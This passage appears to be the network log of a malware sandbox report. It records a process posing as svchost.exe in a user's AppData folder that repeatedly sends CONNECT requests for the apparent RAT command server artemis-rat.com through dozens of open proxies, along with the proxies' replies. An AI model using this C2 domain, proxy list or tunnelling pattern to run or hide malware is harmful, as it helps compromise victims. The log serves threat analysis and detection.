Mar 9, 2024 13:14:28.929944992 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2094	192.168.2.5	56681	104.16.105.15	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.777841091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.931910038 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2095	192.168.2.5	56414	154.236.179.226	1981	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.783364058 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.564022064 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.742468119 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.965069056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.366430998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2096	192.168.2.5	56874	202.159.60.65	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.784373045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2097	192.168.2.5	56876	202.159.60.65	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.785128117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2098	192.168.2.5	56877	202.159.60.65	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.785880089 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2099	192.168.2.5	56398	222.220.102.159	8000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.786967993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2100	192.168.2.5	56440	62.33.53.248	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.786968946 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2101	192.168.2.5	56878	202.159.60.65	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.787044048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2102	192.168.2.5	56421	139.99.148.90	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.795222044 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.564080954 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.080266953 CET	536	IN	HTTP/1.1 407 Proxy Authentication Required Server: squid/3.5.20 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3711 X-Squid-Error: ERR_CACHE_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en Proxy-Authenticate: Basic realm="Squid Basic Authentication" X-Cache: MISS from ns547184.ip-139-99-148.net X-Cache-Lookup: NONE from ns547184.ip-139-99-148.net:3128 Via: 1.1 ns547184.ip-139-99-148.net (squid/3.5.20) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f Data Ascii: <!DOCTYPE html PUBLIC "-/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2103	192.168.2.5	56588	38.162.3.175	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.796520948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.241336107 CET	111	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="" Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 Data Ascii: Proxy Authentication Required

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2104	192.168.2.5	56689	23.227.38.198	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.803762913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.958096981 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2105	192.168.2.5	56701	104.25.244.70	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.806272984 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.960486889 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2106	192.168.2.5	56887	41.86.252.91	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.807176113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2107	192.168.2.5	56889	41.86.252.91	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.807758093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2108	192.168.2.5	56890	41.86.252.91	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.808984995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2109	192.168.2.5	56891	41.86.252.91	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.809941053 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2110	192.168.2.5	56706	104.16.105.182	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.811458111 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.966265917 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2111	192.168.2.5	56477	62.85.224.217	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.815301895 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2112	192.168.2.5	56714	104.18.254.76	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.818840027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.973155022 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2113	192.168.2.5	56686	34.49.208.221	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.818840027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2114	192.168.2.5	56547	18.135.133.116	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.819068909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.111432076 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:28 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2115	192.168.2.5	56585	98.162.25.7	31653	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.820594072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2116	192.168.2.5	56587	132.226.7.23	30277	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.827133894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2117	192.168.2.5	56556	34.81.72.31	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.834563017 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.564022064 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.481901884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.380593061 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2118	192.168.2.5	56508	159.223.71.71	59159	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.834743977 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2119	192.168.2.5	56722	159.89.138.130	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.844425917 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.015568972 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.10.3 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2120	192.168.2.5	56553	194.182.187.78	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.844611883 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.536746025 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2121	192.168.2.5	56752	104.21.85.109	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.846049070 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.000257015 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2122	192.168.2.5	56385	122.114.232.137	808	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.847071886 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2123	192.168.2.5	56734	47.88.3.19	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.850858927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
